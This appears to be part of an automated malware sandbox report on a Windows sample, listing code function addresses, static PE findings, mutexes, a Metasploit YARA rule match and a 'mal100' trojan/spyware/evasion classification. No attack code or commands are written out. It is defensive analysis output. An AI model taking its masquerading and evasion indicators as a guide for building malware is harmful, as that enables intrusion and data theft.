            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE45C0013_2_00007FF6AAE45C00
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE289E013_2_00007FF6AAE289E0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE4696413_2_00007FF6AAE46964
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE2A2DB13_2_00007FF6AAE2A2DB
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE2100013_2_00007FF6AAE21000
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE4641813_2_00007FF6AAE46418
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE408C813_2_00007FF6AAE408C8
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE32C1013_2_00007FF6AAE32C10
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE43C1013_2_00007FF6AAE43C10
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE31B5013_2_00007FF6AAE31B50
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE35D3013_2_00007FF6AAE35D30
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE2ACAD13_2_00007FF6AAE2ACAD
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE2A47B13_2_00007FF6AAE2A47B
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE339A413_2_00007FF6AAE339A4
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE3216413_2_00007FF6AAE32164
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE3194413_2_00007FF6AAE31944
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE3DA5C13_2_00007FF6AAE3DA5C
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE2980013_2_00007FF6AAE29800
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE3879413_2_00007FF6AAE38794
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE31F6013_2_00007FF6AAE31F60
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE3174013_2_00007FF6AAE31740
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE380E413_2_00007FF6AAE380E4
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE408C813_2_00007FF6AAE408C8
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE440AC13_2_00007FF6AAE440AC
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE4187413_2_00007FF6AAE41874
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE335A013_2_00007FF6AAE335A0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE3E57013_2_00007FF6AAE3E570
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE31D5413_2_00007FF6AAE31D54
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE4972813_2_00007FF6AAE49728
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE3DEF013_2_00007FF6AAE3DEF0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE39EA013_2_00007FF6AAE39EA0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE45E7C13_2_00007FF6AAE45E7C
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeCode function: 15_1_00419E1D15_1_00419E1D
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeCode function: 15_1_0040BF8F15_1_0040BF8F
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0041005419_2_00410054
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040F69019_2_0040F690
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040F04019_2_0040F040
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0043885D19_2_0043885D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040786019_2_00407860
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0042906919_2_00429069
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0043787019_2_00437870
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040100019_2_00401000
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0042382D19_2_0042382D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040A08019_2_0040A080
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0044189419_2_00441894
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_004438B019_2_004438B0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0041417019_2_00414170
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040B10019_2_0040B100
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0042610619_2_00426106
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0041310919_2_00413109
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040E13019_2_0040E130
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0041A13019_2_0041A130
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_004129E119_2_004129E1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0041E1F019_2_0041E1F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_004111F519_2_004111F5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_004131FC19_2_004131FC
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0042698019_2_00426980
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0044198019_2_00441980
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0042899619_2_00428996
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040820019_2_00408200
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_004402CF19_2_004402CF
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0044328019_2_00443280
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040CAA019_2_0040CAA0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_004412A019_2_004412A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_004012AA19_2_004012AA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00406AB019_2_00406AB0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0042234019_2_00422340
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040135819_2_00401358
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040DB6019_2_0040DB60
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00437B2019_2_00437B20
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00427B2D19_2_00427B2D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00443BF019_2_00443BF0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0042838019_2_00428380
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0042545919_2_00425459
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00408C6019_2_00408C60
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00422C6E19_2_00422C6E
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040AC7019_2_0040AC70
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040BC1019_2_0040BC10
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00428EEB19_2_00428EEB
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0042BCB019_2_0042BCB0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00440D5019_2_00440D50
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0042750019_2_00427500
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0041353419_2_00413534
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040A5D019_2_0040A5D0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00426DE019_2_00426DE0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00404DF019_2_00404DF0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00409D8A19_2_00409D8A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_004435A019_2_004435A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00441E4019_2_00441E40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00406E5019_2_00406E50
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0041466819_2_00414668
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00408E1619_2_00408E16
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040162C19_2_0040162C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0041163C19_2_0041163C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00428EEB19_2_00428EEB
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0041068019_2_00410680
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0041269F19_2_0041269F
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00410F6019_2_00410F60
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0040370019_2_00403700
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0042470219_2_00424702
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0041971019_2_00419710
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00432F2019_2_00432F20
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0043CF2019_2_0043CF20
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00429FE019_2_00429FE0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00426FFD19_2_00426FFD
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00430FA019_2_00430FA0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE4696420_2_00007FF6AAE46964
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE2100020_2_00007FF6AAE21000
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE4641820_2_00007FF6AAE46418
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE408C820_2_00007FF6AAE408C8
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE32C1020_2_00007FF6AAE32C10
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE43C1020_2_00007FF6AAE43C10
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE45C0020_2_00007FF6AAE45C00
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE31B5020_2_00007FF6AAE31B50
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE35D3020_2_00007FF6AAE35D30
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE2ACAD20_2_00007FF6AAE2ACAD
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE2A47B20_2_00007FF6AAE2A47B
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE289E020_2_00007FF6AAE289E0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE339A420_2_00007FF6AAE339A4
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE3216420_2_00007FF6AAE32164
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE3194420_2_00007FF6AAE31944
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE2A2DB20_2_00007FF6AAE2A2DB
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE3DA5C20_2_00007FF6AAE3DA5C
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE2980020_2_00007FF6AAE29800
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE3879420_2_00007FF6AAE38794
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE31F6020_2_00007FF6AAE31F60
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE3174020_2_00007FF6AAE31740
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE380E420_2_00007FF6AAE380E4
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE408C820_2_00007FF6AAE408C8
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE440AC20_2_00007FF6AAE440AC
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE4187420_2_00007FF6AAE41874
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE335A020_2_00007FF6AAE335A0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE3E57020_2_00007FF6AAE3E570
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE31D5420_2_00007FF6AAE31D54
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE4972820_2_00007FF6AAE49728
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE3DEF020_2_00007FF6AAE3DEF0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE39EA020_2_00007FF6AAE39EA0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE45E7C20_2_00007FF6AAE45E7C
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA58C188023_2_00007FFBA58C1880
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA58C12F023_2_00007FFBA58C12F0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DAC48023_2_00007FFBA5DAC480
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DB098023_2_00007FFBA5DB0980
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DE5E8023_2_00007FFBA5DE5E80
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DF363C23_2_00007FFBA5DF363C
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DF0E3023_2_00007FFBA5DF0E30
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DF460823_2_00007FFBA5DF4608
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DE4E1023_2_00007FFBA5DE4E10
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5E0A39E23_2_00007FFBA5E0A39E
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5E0658023_2_00007FFBA5E06580
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DF057023_2_00007FFBA5DF0570
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5E044A023_2_00007FFBA5E044A0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DD5FC823_2_00007FFBA5DD5FC8
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5E0A39E23_2_00007FFBA5E0A39E
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DF672023_2_00007FFBA5DF6720
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DF1F1023_2_00007FFBA5DF1F10
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DF16F023_2_00007FFBA5DF16F0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5E0169C23_2_00007FFBA5E0169C
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DD81D823_2_00007FFBA5DD81D8
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DF816C23_2_00007FFBA5DF816C
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DF895023_2_00007FFBA5DF8950
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DE40E023_2_00007FFBA5DE40E0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DD6C7423_2_00007FFBA5DD6C74
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DE341023_2_00007FFBA5DE3410
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DF73E023_2_00007FFBA5DF73E0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5E0A39E23_2_00007FFBA5E0A39E
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5E02AE023_2_00007FFBA5E02AE0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DD7AA823_2_00007FFBA5DD7AA8
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5E032B823_2_00007FFBA5E032B8
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: String function: 00007FF6AAE22710 appears 104 times
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: String function: 00007FFBA5DA3880 appears 114 times
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: String function: 00007FF6AAE22910 appears 34 times
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: String function: 00007FFBA5DA3800 appears 51 times
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00419D90 appears 158 times
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040C780 appears 61 times
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7488 -s 900
            Source: file.exeStatic PE information: invalid certificate
            Source: unicodedata.pyd.13.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: _overlapped.pyd.13.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: _overlapped.pyd.21.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dll.13.drStatic PE information: Number of sections : 11 > 10
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe.4.drStatic PE information: Number of sections : 18 > 10
            Source: libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dll.21.drStatic PE information: Number of sections : 11 > 10
            Source: zlib1.dll.13.drStatic PE information: Number of sections : 12 > 10
            Source: Channel2[1].exe.4.drStatic PE information: Number of sections : 18 > 10
            Source: zlib1.dll.21.drStatic PE information: Number of sections : 12 > 10
            Source: file.exeStatic PE information: No import functions for PE file found
            Source: file.exe, 00000000.00000000.1413830904.000001DC89A72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTransponer.exe6 vs file.exe
            Source: file.exe, 00000000.00000002.1511871135.000001DC9BB26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePDFReader.exe4 vs file.exe
            Source: file.exe, 00000000.00000002.1511871135.000001DC9B5B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePDFReader.exe4 vs file.exe
            Source: 0000000E.00000002.1975978502.0000000003812000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@32/3095@5/12
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DE12C0 GetDiskFreeSpaceExW,23_2_00007FFBA5DE12C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_004220E0 CoCreateInstance,19_2_004220E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\Documents\iofolko5Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
            Source: C:\Users\user\AppData\Local\Temp\service123.exeMutant created: \Sessions\1\BaseNamedObjects\baaNaKPYpveCJdSxoocT
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7488
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\KejwopdnfWW_3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oir1elw2.mib.ps1Jump to behavior
            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: file.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
